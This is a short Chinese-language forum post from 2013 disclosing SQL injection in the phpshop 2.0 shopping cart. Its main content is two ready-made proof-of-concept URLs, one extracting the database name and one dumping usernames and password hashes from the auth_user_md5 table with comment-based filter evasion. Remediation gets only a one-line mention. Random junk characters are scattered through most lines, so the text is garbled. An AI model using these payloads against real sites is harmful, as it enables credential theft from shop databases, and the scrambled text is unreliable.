标题 : phpshop 2.0 SQL Injection Vulnerability
) V& D+ {' ]3 _8 @8 L7 Y% P J) b+ W% z/ } R; ~: V+ w
作者 : By onestree
8 t# ~0 Y/ D2 w下载地址 : http://code.google.com/p/phpshop/downloads/list
/ t, \* L% I+ @8 H3 I6 G: y4 n测试地址: windows 7 / ubuntu" }7 ]2 _( W& W# I& x$ I7 S
~8 v7 b( F( _" p1 s3 c2 }
6 H% H0 N' s' b" x
SQLi p0c:+ b6 z4 n; i" \; x# p7 }
& Y/ }1 ?) r4 N* m/ ?==================
4 Y7 T* ~4 B( l9 n t9 q. U 4 x! { W. z; y+ y; h# w5 f
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'5 Y" V* c: w: |# N/ S
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --: p8 ]2 r: Q2 m& R; d' P, Q
/ T6 D; c8 y8 v) y3 M: r# u% }http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--8 q- u( A0 L: v+ O- V% z/ S( K5 d
% _# z B! `2 b5 U" ]
修复:
+ [3 C8 n0 Y, a6 o加强过滤
3 p3 ~6 v) V! S. H0 O- B/ w1 P" @3 g! C' C# }/ h- R2 l( n
$ H, a f$ s" D( s1 t0 v |
发表于 2013-1-18 18:24:10
收藏
支持
反对